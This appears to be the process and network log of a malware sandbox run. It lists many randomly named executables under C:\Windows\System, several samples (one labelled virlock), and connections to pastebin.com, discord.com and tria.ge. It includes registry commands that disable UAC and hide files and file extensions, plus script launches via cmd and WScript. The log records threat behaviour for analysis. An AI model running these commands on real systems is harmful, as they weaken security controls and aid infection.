C:\Windows\System\BFOUDpb.exe

C:\Windows\System\BFOUDpb.exe

C:\Windows\System\zWnMVNj.exe

C:\Windows\System\zWnMVNj.exe

C:\Windows\System\KmvdGvw.exe

C:\Windows\System\KmvdGvw.exe

C:\Windows\System\ObfrJkM.exe

C:\Windows\System\ObfrJkM.exe

C:\Windows\System\YHbTeIr.exe

C:\Windows\System\YHbTeIr.exe

C:\Windows\System\IrhAKpb.exe

C:\Windows\System\IrhAKpb.exe

C:\Windows\System\fvMKBXM.exe

C:\Windows\System\fvMKBXM.exe

C:\Windows\System\lholCVl.exe

C:\Windows\System\lholCVl.exe

C:\Windows\System\kvNuwxF.exe

C:\Windows\System\kvNuwxF.exe

C:\Windows\System\qVPSdmI.exe

C:\Windows\System\qVPSdmI.exe

C:\Windows\System\pJvffIw.exe

C:\Windows\System\pJvffIw.exe

\??\c:\u288608.exe

c:\u288608.exe

\??\c:\644040.exe

c:\644040.exe

C:\Windows\SysWOW64\Ekonpckp.exe

C:\Windows\system32\Ekonpckp.exe

\??\c:\224648.exe

c:\224648.exe

\??\c:\lfrxrfx.exe

c:\lfrxrfx.exe

C:\Program Files (x86)\Internet Explorer\iexplore.exe

"C:\Program Files (x86)\Internet Explorer\iexplore.exe"

\??\c:\hhhhnt.exe

c:\hhhhnt.exe

C:\Windows\System\dcNYjEZ.exe

C:\Windows\System\dcNYjEZ.exe

C:\Windows\System\lmlyObm.exe

C:\Windows\System\lmlyObm.exe

C:\Windows\System\dhcwlKM.exe

C:\Windows\System\dhcwlKM.exe

C:\Windows\System\BQKorlB.exe

C:\Windows\System\BQKorlB.exe

C:\Windows\System\MBXcGGL.exe

C:\Windows\System\MBXcGGL.exe

C:\Windows\System\oCXOmuX.exe

C:\Windows\System\oCXOmuX.exe

C:\Windows\System\wNouzaN.exe

C:\Windows\System\wNouzaN.exe

C:\Windows\System\UkzYNcf.exe

C:\Windows\System\UkzYNcf.exe

C:\Windows\System\EmbOucE.exe

C:\Windows\System\EmbOucE.exe

C:\Windows\System\xXSZgxb.exe

C:\Windows\System\xXSZgxb.exe

C:\Windows\System\sNqANBE.exe

C:\Windows\System\sNqANBE.exe

C:\Windows\System\hawThAV.exe

C:\Windows\System\hawThAV.exe

C:\Windows\System\fIvvwLw.exe

C:\Windows\System\fIvvwLw.exe

C:\Windows\System\vBKTCby.exe

C:\Windows\System\vBKTCby.exe

C:\Windows\System\erpChwD.exe

C:\Windows\System\erpChwD.exe

C:\Windows\System\JGxQCGl.exe

C:\Windows\System\JGxQCGl.exe

C:\Windows\System\eBuoDfz.exe

C:\Windows\System\eBuoDfz.exe

C:\Windows\System\nZhSDmu.exe

C:\Windows\System\nZhSDmu.exe

C:\Windows\System\mdKZwlZ.exe

C:\Windows\System\mdKZwlZ.exe

C:\Windows\System\vINdRQI.exe

C:\Windows\System\vINdRQI.exe

C:\Windows\System\WMHKPtb.exe

C:\Windows\System\WMHKPtb.exe

C:\Windows\System\DUyTJAF.exe

C:\Windows\System\DUyTJAF.exe

C:\Windows\SysWOW64\IExplorer.exe

C:\Windows\system32\IExplorer.exe

C:\Windows\System\qRHxdPU.exe

C:\Windows\System\qRHxdPU.exe

C:\Windows\System\ocJuGTT.exe

C:\Windows\System\ocJuGTT.exe

C:\Windows\SysWOW64\Eomffaag.exe

C:\Windows\system32\Eomffaag.exe

C:\Windows\System\kTWtwPd.exe

C:\Windows\System\kTWtwPd.exe

\??\c:\828226.exe

c:\828226.exe

C:\Users\Admin\AppData\Local\directory\name.exe

C:\Users\Admin\Downloads\240920-vlhe9axckff87824c8d13618b98793c9757dc907a608b617c12caca90a880e90ca6485b463.exe

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\shell.vbs"

C:\Users\Admin\Downloads\240920-t7m27axajr2024-09-20_006fbb7a7a5386fe5629f895d8969b45_virlock.exe

C:\Users\Admin\Downloads\240920-t7m27axajr2024-09-20_006fbb7a7a5386fe5629f895d8969b45_virlock

C:\Windows\explorer.exe

"C:\Windows\explorer.exe"

C:\Windows\System\kpenNln.exe

C:\Windows\System\kpenNln.exe

C:\Windows\System\WjdasKg.exe

C:\Windows\System\WjdasKg.exe

C:\Windows\System\ZXEmTRv.exe

C:\Windows\System\ZXEmTRv.exe

C:\Windows\System\wCuaWzs.exe

C:\Windows\System\wCuaWzs.exe

\??\c:\7flfflf.exe

c:\7flfflf.exe

\??\c:\dppvj.exe

c:\dppvj.exe

C:\Windows\System\cpfxyZQ.exe

C:\Windows\System\cpfxyZQ.exe

C:\Windows\SysWOW64\Gndick32.exe

C:\Windows\system32\Gndick32.exe

\??\c:\6422666.exe

c:\6422666.exe

C:\Windows\SysWOW64\Geoapenf.exe

C:\Windows\system32\Geoapenf.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\Downloads\240920-t7m27axajr2024-09-20_006fbb7a7a5386fe5629f895d8969b45_virlock"

C:\Windows\System\wdLrGpm.exe

C:\Windows\System\wdLrGpm.exe

C:\Windows\System\WRxcjUk.exe

C:\Windows\System\WRxcjUk.exe

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v HideFileExt /t REG_DWORD /d 1

C:\Windows\System\xZoXFhk.exe

C:\Windows\System\xZoXFhk.exe

C:\Windows\System\knYGnsR.exe

C:\Windows\System\knYGnsR.exe

C:\Windows\System\UWHTKGE.exe

C:\Windows\System\UWHTKGE.exe

C:\Windows\System\NFgYSLw.exe

C:\Windows\System\NFgYSLw.exe

C:\Windows\SysWOW64\reg.exe

reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced /f /v Hidden /t REG_DWORD /d 2

C:\Windows\SysWOW64\reg.exe

reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD /f

C:\Windows\System\DFDkQLh.exe

C:\Windows\System\DFDkQLh.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xAIUkwAs.bat" "C:\Users\Admin\Downloads\240920-t7m27axajr2024-09-20_006fbb7a7a5386fe5629f895d8969b45_virlock.exe""

C:\Windows\System\uRKIAyO.exe

C:\Windows\System\uRKIAyO.exe

C:\Windows\System\QLKNfVf.exe

C:\Windows\System\QLKNfVf.exe

C:\Windows\System\kZOjWYg.exe

C:\Windows\System\kZOjWYg.exe

C:\Windows\System\ytnJftw.exe

C:\Windows\System\ytnJftw.exe

C:\Windows\System\WDyxoUM.exe

C:\Windows\System\WDyxoUM.exe

C:\Windows\System\XjMcmyi.exe

C:\Windows\System\XjMcmyi.exe

C:\Windows\System\dIknDTf.exe

C:\Windows\System\dIknDTf.exe

C:\Windows\System\VtmifXr.exe

C:\Windows\System\VtmifXr.exe

C:\Windows\System\JpSJaGe.exe

C:\Windows\System\JpSJaGe.exe

C:\Windows\System\ehhizLj.exe

C:\Windows\System\ehhizLj.exe

C:\Windows\System\IemaelU.exe

C:\Windows\System\IemaelU.exe

C:\Windows\System\gWGnuxu.exe

C:\Windows\System\gWGnuxu.exe

C:\Windows\System\eFdaOWt.exe

C:\Windows\System\eFdaOWt.exe

C:\Windows\System\idHtXdG.exe

C:\Windows\System\idHtXdG.exe

C:\Windows\System\VwkFZtL.exe

C:\Windows\System\VwkFZtL.exe

C:\Windows\System\WIJkKHI.exe

C:\Windows\System\WIJkKHI.exe

C:\Windows\System\aeoEhWk.exe

C:\Windows\System\aeoEhWk.exe

C:\Windows\System\tcXtNjS.exe

C:\Windows\System\tcXtNjS.exe

C:\Windows\System\QBGNqNm.exe

C:\Windows\System\QBGNqNm.exe

\??\c:\046666.exe

c:\046666.exe

C:\Windows\System\XkpqadY.exe

C:\Windows\System\XkpqadY.exe

C:\Windows\System\qrqXdyQ.exe

C:\Windows\System\qrqXdyQ.exe

C:\Windows\System\IcwCwwb.exe

C:\Windows\System\IcwCwwb.exe

C:\Windows\System\xXlQvAg.exe

C:\Windows\System\xXlQvAg.exe

C:\Windows\System\nXpFagQ.exe

C:\Windows\System\nXpFagQ.exe

C:\Windows\System\OvjvDjt.exe

C:\Windows\System\OvjvDjt.exe

C:\Windows\System\BQlyxsI.exe

C:\Windows\System\BQlyxsI.exe

\??\c:\jppjv.exe

c:\jppjv.exe

C:\Windows\System\vzxBzxe.exe

C:\Windows\System\vzxBzxe.exe

C:\Windows\System\eMQmBFo.exe

C:\Windows\System\eMQmBFo.exe

C:\Windows\System\pbWoZdA.exe

C:\Windows\System\pbWoZdA.exe

C:\Windows\System\IyjNcdF.exe

C:\Windows\System\IyjNcdF.exe

\??\c:\tnnntb.exe

c:\tnnntb.exe

C:\Windows\System\UaACgwP.exe

C:\Windows\System\UaACgwP.exe

C:\Windows\System\fceMQXx.exe

C:\Windows\System\fceMQXx.exe

C:\Windows\System\aPbVfsu.exe

C:\Windows\System\aPbVfsu.exe

\??\c:\flrfrll.exe

c:\flrfrll.exe

C:\Windows\System\OvOmzet.exe

C:\Windows\System\OvOmzet.exe

C:\Windows\System\rxohnVa.exe

C:\Windows\System\rxohnVa.exe

C:\Windows\System\CoLnAIq.exe

C:\Windows\System\CoLnAIq.exe

C:\Windows\System\ywAVIIx.exe

C:\Windows\System\ywAVIIx.exe

C:\Windows\System\XbBvsdh.exe

C:\Windows\System\XbBvsdh.exe

C:\Windows\System\HOwaxRk.exe

C:\Windows\System\HOwaxRk.exe

C:\Windows\System\sdfeJEe.exe

C:\Windows\System\sdfeJEe.exe

C:\Windows\System\xmyvTKW.exe

C:\Windows\System\xmyvTKW.exe

C:\Windows\System\ARYydSZ.exe

C:\Windows\System\ARYydSZ.exe

C:\Windows\System\EEaKchb.exe

C:\Windows\System\EEaKchb.exe

C:\Windows\System\rjnSWmh.exe

C:\Windows\System\rjnSWmh.exe

C:\Windows\System\jPMwSHE.exe

C:\Windows\System\jPMwSHE.exe

C:\Windows\System\xevEVrX.exe

C:\Windows\System\xevEVrX.exe

C:\Windows\System\BpMhKdh.exe

C:\Windows\System\BpMhKdh.exe

C:\Windows\System\XKuKndJ.exe

C:\Windows\System\XKuKndJ.exe

C:\Windows\System\hmLAhEx.exe

C:\Windows\System\hmLAhEx.exe

C:\Windows\System\CMAvYNO.exe

C:\Windows\System\CMAvYNO.exe

C:\Users\Admin\Downloads\240920-vhbtasxaqcee091f677598e979e0e9b8c5c00fb6a2_JaffaCakes118.exe

"C:\Users\Admin\Downloads\240920-vhbtasxaqcee091f677598e979e0e9b8c5c00fb6a2_JaffaCakes118.exe"

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:9204 CREDAT:82945 /prefetch:2

C:\Windows\System\KWAtjdq.exe

C:\Windows\System\KWAtjdq.exe

C:\Windows\System\udCxGnY.exe

C:\Windows\System\udCxGnY.exe

\??\c:\0624840.exe

c:\0624840.exe

\??\c:\1djdd.exe

c:\1djdd.exe

\??\c:\5bbbnh.exe

c:\5bbbnh.exe

\??\c:\g0284.exe

c:\g0284.exe

\??\c:\jdjdp.exe

c:\jdjdp.exe

C:\Windows\SysWOW64\Njbgmjgl.exe

C:\Windows\system32\Njbgmjgl.exe

C:\Windows\SysWOW64\Njbgmjgl.exe

C:\Windows\system32\Njbgmjgl.exe

\??\c:\422808.exe

c:\422808.exe

C:\Windows\System\VAwEntI.exe

C:\Windows\System\VAwEntI.exe

C:\Windows\System\QxhjyIL.exe

C:\Windows\System\QxhjyIL.exe

\??\c:\ppdjj.exe

c:\ppdjj.exe

C:\Windows\System\DcLJpwc.exe

C:\Windows\System\DcLJpwc.exe

C:\Windows\System\qLbYkPj.exe

C:\Windows\System\qLbYkPj.exe

C:\Windows\System\ZQmJEaV.exe

C:\Windows\System\ZQmJEaV.exe

C:\Windows\SysWOW64\Oihmedma.exe

C:\Windows\system32\Oihmedma.exe

C:\Windows\SysWOW64\Ojemig32.exe

C:\Windows\system32\Ojemig32.exe

C:\Windows\System\cAohtzW.exe

C:\Windows\System\cAohtzW.exe

C:\Windows\System\pnFoTyF.exe

C:\Windows\System\pnFoTyF.exe

C:\Windows\System\dLuIRRK.exe

C:\Windows\System\dLuIRRK.exe

C:\Windows\System\xKgPXJP.exe

C:\Windows\System\xKgPXJP.exe

C:\Windows\System\KDHgQoV.exe

C:\Windows\System\KDHgQoV.exe

C:\Windows\System\ftQMQOL.exe

C:\Windows\System\ftQMQOL.exe

C:\Windows\System\fDdisvs.exe

C:\Windows\System\fDdisvs.exe

C:\Windows\System\GRuVQcQ.exe

C:\Windows\System\GRuVQcQ.exe

C:\Windows\System\pFVXsUT.exe

C:\Windows\System\pFVXsUT.exe

C:\Windows\System\GGYYSLe.exe

C:\Windows\System\GGYYSLe.exe

C:\Windows\System\lGNovFm.exe

C:\Windows\System\lGNovFm.exe

C:\Windows\System\VXRZNMU.exe

C:\Windows\System\VXRZNMU.exe

C:\Windows\System\vqXcjzq.exe

C:\Windows\System\vqXcjzq.exe

C:\Windows\System\rXJuBCj.exe

C:\Windows\System\rXJuBCj.exe

C:\Windows\System\qBxzDiT.exe

C:\Windows\System\qBxzDiT.exe

C:\Windows\System\LCMTyFC.exe

C:\Windows\System\LCMTyFC.exe

C:\Windows\System\XtoxSCo.exe

C:\Windows\System\XtoxSCo.exe

C:\Windows\System\SgnZurB.exe

C:\Windows\System\SgnZurB.exe

C:\Windows\System\KUUMqZe.exe

C:\Windows\System\KUUMqZe.exe

C:\Windows\System\TiyKKVN.exe

C:\Windows\System\TiyKKVN.exe

C:\Windows\System\wskOavf.exe

C:\Windows\System\wskOavf.exe

C:\Windows\System\BgezNxi.exe

C:\Windows\System\BgezNxi.exe

C:\Windows\System\gegQhao.exe

C:\Windows\System\gegQhao.exe

C:\Windows\System\KBnugmq.exe

C:\Windows\System\KBnugmq.exe

C:\Windows\System\ynbUpNb.exe

C:\Windows\System\ynbUpNb.exe

C:\Windows\System\gVunMEF.exe

C:\Windows\System\gVunMEF.exe

C:\Windows\System\dUAvtqg.exe

C:\Windows\System\dUAvtqg.exe

C:\Windows\System\iLZKuQw.exe

C:\Windows\System\iLZKuQw.exe

C:\Windows\System\mvxLaxQ.exe

C:\Windows\System\mvxLaxQ.exe

C:\Windows\System\XNATXIo.exe

C:\Windows\System\XNATXIo.exe

C:\Windows\System\aIlVSlv.exe

C:\Windows\System\aIlVSlv.exe

C:\Windows\System\AedGSyt.exe

C:\Windows\System\AedGSyt.exe

C:\Windows\System\ZkfGpoc.exe

C:\Windows\System\ZkfGpoc.exe

C:\Windows\System\IvbayuS.exe

C:\Windows\System\IvbayuS.exe

C:\Windows\System\ZCDSfhM.exe

C:\Windows\System\ZCDSfhM.exe

C:\Windows\System\ODlYgOZ.exe

C:\Windows\System\ODlYgOZ.exe

C:\Windows\System\BoLQXLi.exe

C:\Windows\System\BoLQXLi.exe

C:\Windows\System\mdahkZI.exe

C:\Windows\System\mdahkZI.exe

C:\Windows\System\tYhLJwB.exe

C:\Windows\System\tYhLJwB.exe

C:\Windows\System\UxndBid.exe

C:\Windows\System\UxndBid.exe

C:\Windows\System\zBDgajC.exe

C:\Windows\System\zBDgajC.exe

C:\Windows\System\CLACXwv.exe

C:\Windows\System\CLACXwv.exe

C:\Windows\System\FuoQgxO.exe

C:\Windows\System\FuoQgxO.exe

C:\Windows\System\ZjLQkJz.exe

C:\Windows\System\ZjLQkJz.exe

C:\Windows\System\vtZfmBO.exe

C:\Windows\System\vtZfmBO.exe

C:\Windows\System\KvpRXWo.exe

C:\Windows\System\KvpRXWo.exe

C:\Windows\System\kgZOmCA.exe

C:\Windows\System\kgZOmCA.exe

C:\Windows\System\YHNQhDu.exe

C:\Windows\System\YHNQhDu.exe

C:\Windows\System\zsepyEV.exe

C:\Windows\System\zsepyEV.exe

C:\Windows\System\iKTTiEm.exe

C:\Windows\System\iKTTiEm.exe

C:\Windows\System\BcocxJk.exe

C:\Windows\System\BcocxJk.exe

C:\Windows\System\AESOzxb.exe

C:\Windows\System\AESOzxb.exe

C:\Windows\System\vOwaTLJ.exe

C:\Windows\System\vOwaTLJ.exe

C:\Windows\System\KCSKiiQ.exe

C:\Windows\System\KCSKiiQ.exe

C:\Windows\System\keJXBzy.exe

C:\Windows\System\keJXBzy.exe

C:\Windows\System\uNBflnR.exe

C:\Windows\System\uNBflnR.exe

C:\Windows\System\AivRJkU.exe

C:\Windows\System\AivRJkU.exe

C:\Windows\System\XJTPqWv.exe

C:\Windows\System\XJTPqWv.exe

C:\Windows\System\NIrBaFD.exe

C:\Windows\System\NIrBaFD.exe

C:\Windows\System\gjkalhX.exe

C:\Windows\System\gjkalhX.exe

C:\Windows\System\GcnUJZQ.exe

C:\Windows\System\GcnUJZQ.exe

C:\Windows\System\oUwmIDA.exe

C:\Windows\System\oUwmIDA.exe

C:\Windows\System\bGdjlgH.exe

C:\Windows\System\bGdjlgH.exe

C:\Windows\System\lsaXDYo.exe

C:\Windows\System\lsaXDYo.exe

C:\Windows\System\gXVIext.exe

C:\Windows\System\gXVIext.exe

C:\Windows\System\SeWwesp.exe

C:\Windows\System\SeWwesp.exe

C:\Windows\System\WBevxMx.exe

C:\Windows\System\WBevxMx.exe

C:\Windows\System\JpBKwAL.exe

C:\Windows\System\JpBKwAL.exe

C:\Windows\System\rwCnwDr.exe

C:\Windows\System\rwCnwDr.exe

C:\Windows\System\PvtlGGr.exe

C:\Windows\System\PvtlGGr.exe

C:\Windows\System\bLgpUZo.exe

C:\Windows\System\bLgpUZo.exe

C:\Windows\System\xZutBfZ.exe

C:\Windows\System\xZutBfZ.exe

C:\Windows\System\ZANlbOE.exe

C:\Windows\System\ZANlbOE.exe

C:\Windows\System\wRUQSRD.exe

C:\Windows\System\wRUQSRD.exe

C:\Windows\System\IvzJspo.exe

C:\Windows\System\IvzJspo.exe

\??\c:\httbnn.exe

c:\httbnn.exe

\??\c:\440044.exe

c:\440044.exe

\??\c:\6022666.exe

c:\6022666.exe

\??\c:\frrlllf.exe

c:\frrlllf.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4316 -s 484

C:\Windows\SysWOW64\shell.exe

"C:\Windows\system32\shell.exe" "C:\Windows\system32\svchust.exe"

C:\Windows\System\hmydTVR.exe

C:\Windows\System\hmydTVR.exe

C:\Windows\System\BOsZpId.exe

C:\Windows\System\BOsZpId.exe

C:\Windows\System\lCpUdaP.exe

C:\Windows\System\lCpUdaP.exe

C:\Windows\System\qxOmFKi.exe

C:\Windows\System\qxOmFKi.exe

\??\c:\rflffxr.exe

c:\rflffxr.exe

C:\Windows\System\VRGtXRQ.exe

C:\Windows\System\VRGtXRQ.exe

\??\c:\5vjdj.exe

c:\5vjdj.exe

C:\Windows\SysWOW64\Cgiohbfi.exe

C:\Windows\system32\Cgiohbfi.exe

C:\Windows\SysWOW64\Ckdkhq32.exe

C:\Windows\system32\Ckdkhq32.exe

C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE

"C:\Users\Admin\Local Settings\Application Data\WINDOWS\WINLOGON.EXE"

C:\Windows\D3_08.exe

C:\Windows\D3_08.exe

C:\Windows\D3_08.exe

C:\Windows\D3_08.exe

C:\Windows\System\luUnKCP.exe

C:\Windows\System\luUnKCP.exe

\??\c:\o808826.exe

c:\o808826.exe

C:\Windows\System\GdmkVvA.exe

C:\Windows\System\GdmkVvA.exe

C:\Windows\SysWOW64\shell.exe

"C:\Windows\system32\shell.exe" "C:\Users\Admin\AppData\Local\kayitgir.exe"

C:\Windows\System\fwGsmIj.exe

C:\Windows\System\fwGsmIj.exe

C:\Windows\System\ICMktqQ.exe

C:\Windows\System\ICMktqQ.exe

C:\Windows\System\nXJzosP.exe

C:\Windows\System\nXJzosP.exe

C:\Windows\System\QVufZuP.exe

C:\Windows\System\QVufZuP.exe

\??\c:\66288.exe

c:\66288.exe

C:\Windows\System\oFniuoN.exe

C:\Windows\System\oFniuoN.exe

C:\Windows\System\EEKUVcF.exe

C:\Windows\System\EEKUVcF.exe

C:\Windows\System\krxvaWn.exe

C:\Windows\System\krxvaWn.exe

C:\Windows\System\qtyXWax.exe

C:\Windows\System\qtyXWax.exe

C:\Windows\System\pEyfYDF.exe

C:\Windows\System\pEyfYDF.exe

C:\Windows\System\YfMJuUZ.exe

C:\Windows\System\YfMJuUZ.exe

C:\Windows\System\wrGHrfw.exe

C:\Windows\System\wrGHrfw.exe

C:\Windows\System\OcXBHpF.exe

C:\Windows\System\OcXBHpF.exe

C:\Windows\System\vRFKvck.exe

C:\Windows\System\vRFKvck.exe

C:\Windows\System\PKaEaVK.exe

C:\Windows\System\PKaEaVK.exe

C:\Windows\System\FFEVaJl.exe

C:\Windows\System\FFEVaJl.exe

C:\Windows\System\HOuSkOA.exe

C:\Windows\System\HOuSkOA.exe

C:\Windows\System\CWukLHN.exe

C:\Windows\System\CWukLHN.exe

C:\Windows\System\ksWVhhI.exe

C:\Windows\System\ksWVhhI.exe

C:\Windows\System\rWKHEgv.exe

C:\Windows\System\rWKHEgv.exe

C:\Windows\System\EluRYbC.exe

C:\Windows\System\EluRYbC.exe

C:\Windows\System\bvuoyon.exe

C:\Windows\System\bvuoyon.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 ptb.discord.com udp
US 162.159.135.232:443 ptb.discord.com tcp
US 8.8.8.8:53 tria.ge udp
US 104.18.40.144:443 tria.ge tcp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 232.135.159.162.in-addr.arpa udp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
US 104.18.40.144:443 tria.ge tcp
